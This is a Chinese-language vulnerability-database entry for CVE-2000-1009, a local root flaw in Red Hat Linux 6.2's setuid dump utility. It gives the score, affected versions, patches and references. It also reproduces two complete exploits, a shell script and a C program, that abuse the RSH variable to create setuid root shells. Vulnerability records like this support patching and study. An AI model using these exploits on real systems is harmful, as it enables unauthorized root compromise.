CVE-2000-1009
CVSS7.2
发布时间 :2000-12-11 00:00:00
修订时间 :2008-09-05 16:22:25
NMCOES    

[原文]dump in Red Hat Linux 6.2 trusts the pathname specified by the RSH environmental variable, which allows local users to obtain root privileges by modifying the RSH variable to point to a Trojan horse program.


[CNNVD]多个供应商dump不安全环境变量漏洞(CNNVD-200012-058)

        Red Hat Linux 6.2版本的dump信任由RSH环境变量说明的路径名。本地用户通过修改RSH变量指向特洛伊木马程序获得根特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.2Red Hat Linux 6.2
cpe:/o:trustix:secure_linux:1.1Trustix Secure Linux 1.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1009
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1009
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-058
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1871
(VENDOR_ADVISORY)  BID  1871
http://xforce.iss.net/static/5437.php
(VENDOR_ADVISORY)  XF  linux-dump-execute-code
http://archives.neohapsis.com/archives/bugtraq/2000-10/0438.html
(UNKNOWN)  BUGTRAQ  20001030 Redhat 6.2 dump command executes external program with suid priviledge.

- 漏洞信息

多个供应商dump不安全环境变量漏洞
高危 输入验证
2000-12-11 00:00:00 2005-10-20 00:00:00
本地  
        Red Hat Linux 6.2版本的dump信任由RSH环境变量说明的路径名。本地用户通过修改RSH变量指向特洛伊木马程序获得根特权。

- 公告与补丁

        Patches available:
        RedHat dump 0.4 b15-1
        
        NetBSD NetBSD 1.5
        
        NetBSD NetBSD 1.5.1
        
        Wirex Immunix OS 6.2
        

- 漏洞信息 (193)

dump 0.4b15 Local Root Exploit (EDBID:193)
linux local
2000-11-19 Verified
0 Mat
N/A [点击下载]
#!/bin/sh

# Redhat 6.2 dump command executes external program 
# with suid priviledge.
# Discovered by Mat <mat@hacksware.com>
# Written for and by a scriptkid Tasc ;P
# Remember, there's no cure for BSE

echo "dump-0.4b15 root exploit"
echo "Discovered by Mat <mat@hacksware.com>"
echo "-------------------------------------"
echo
DUMP=/sbin/dump
if [ ! -u $DUMP ]; then
  echo "$DUMP is NOT setuid on this system or does not exist at all!"
  echo
  exit 0
fi
export TAPE=iamlame:iamlame
export RSH=/tmp/rsh
cat >/tmp/rsh <<__eof__
#!/bin/sh
cp /bin/sh /tmp/sush
chmod 4755 /tmp/sush
}
__eof__
chmod 755 /tmp/rsh
/sbin/dump -0 /
echo
echo "Waiting for rootshell .... 5 seconds...."
sleep 5
/tmp/sush
id


# milw0rm.com [2000-11-19]
		

- 漏洞信息 (206)

dump 0.4b15 exploit (Redhat 6.2) (EDBID:206)
linux local
2000-11-29 Verified
0 Mat
N/A [点击下载]
/*
**
**  dump-0.4b15x.c
**
**  dump-0.4b15 exploit:
**  Redhat 6.2 dump command executes
**  external program with suid priviledge.
**
**  affected:
**     /sbin/dump
**     /sbin/dump.static
**     /sbin/restore
**     /sbin/restore.static
**
**  Bug found by mat@hacksware.com
**
**  This example was coded by md0claes@mdstud.chalmers.se
**  It was written for EDUCATIONAL PURPOSES ONLY.
**
**
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RUNME     "/tmp/runme"      	/* tmp file		   */
#define SUID_PATH "/tmp/superdude"		/* the power of root */

void usage(char *pname)
{
 fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname);
 fprintf(stdout,   "  d - exploit /sbin/dump\n");
 fprintf(stdout,   "  s - exploit /sbin/dump.static\n");
 fprintf(stdout,   "  r - exploit /sbin/restore\n");
 fprintf(stdout,   "  p - exploit /sbin/restore.static\n\n");
}

int main(int argc, char *argv[], char *envp[])
{
 int fd;
 pid_t pid;
 char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME };
 char   runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash "
                    SUID_PATH "\nchmod 6755 " SUID_PATH };

 char *suid[] = { SUID_PATH, NULL };
 char   *av[] = { "/sbin/restore.static", "restore.static",
                  "-t", "/tmp/foo" };

 if (argc != 2) {
  usage(argv[0]);
  exit(1);
 }

 switch(tolower(argv[1][0])) {

  case 'd':
   av[0] = "/sbin/dump";
   av[1] = "dump";
   av[2] = "-0";
   av[3] = "/";
   break;

  case 's':
   av[0] = "/sbin/dump.static";
   av[1] = "dump.static";
   av[2] = "-0";
   av[3] = "/";
   break;

  case 'r':
   av[0] = "/sbin/restore";
   av[1] = "restore";
   break;

  case 'p':
   break;

  default:
   usage(argv[0]);
   exit(1);
 }

 if ((fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755)) == -1) {
  perror("fopen");
  exit(1);
 }

 if (write(fd, runbuf, sizeof(runbuf)) == -1) {
  perror("write");
  exit(1);
 }
 close(fd);

 if ((pid = fork()) < 0) {
  perror("fork");
  exit(1);
 }

 else if (pid == 0) {
  if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) {
   perror("execle");
   _exit(1);
  }
 }

 sleep(1);
 unlink(RUNME);
 fprintf(stdout, "\nExploited %s \n", av[0]);
 fprintf(stdout, "Running " SUID_PATH "\n");
 execve(SUID_PATH, suid, envp);

 exit(0);
}


// milw0rm.com [2000-11-29]
		

- 漏洞信息

13747
Red Hat Linux dump RSH Environment Variable Subversion Privilege Escalation
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-10-30 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor dump Insecure Environment Variables Vulnerability
Input Validation Error 1871
No Yes
2000-10-31 12:00:00 2009-07-11 03:56:00
This vulnerability was first publicly released to BugTraq by mat@ivntech.com on October 31, 2000.

- 受影响的程序版本

Wirex Immunix OS 6.2
Trustix Secure Linux 1.1
RedHat dump 0.4 b15-1
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
RedHat Linux 7.0
NetBSD NetBSD 1.5.2
Mandriva Linux Mandrake 7.1
Mandriva Linux Mandrake 7.0
Mandriva Linux Mandrake 6.1
Mandriva Linux Mandrake 6.0
Conectiva Linux 5.1
Conectiva Linux 5.0

- 不受影响的程序版本

RedHat Linux 7.0
NetBSD NetBSD 1.5.2
Mandriva Linux Mandrake 7.1
Mandriva Linux Mandrake 7.0
Mandriva Linux Mandrake 6.1
Mandriva Linux Mandrake 6.0
Conectiva Linux 5.1
Conectiva Linux 5.0

- 漏洞讨论

dump is a utility included with various UNIX clones for the purpose of dumping filesystems. A vulnerability exists in the dump package that allows suid execution of other executables.

The dump command is dependent upon the RSH and TAPE environment variables for proper execution in Linux, and the RCMD_CMD environment variable in NetBSD. It is possible for a malicious user to set the RSH or RCMD_CMD environment variable path to any executable. Upon execution of dump program, the file referenced in the path of the environment variable will be executed with suid root priviledges. Successful exploitation of this vulnerability results in root compromise.

- 漏洞利用

This exploit first posted to Bugtraq by Claes Nyberg &lt;md0claes@mdstud.chalmers.se&gt; on November 2, 2000.

- 解决方案

Patches available:


RedHat dump 0.4 b15-1

NetBSD NetBSD 1.5

NetBSD NetBSD 1.5.1

Wirex Immunix OS 6.2

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站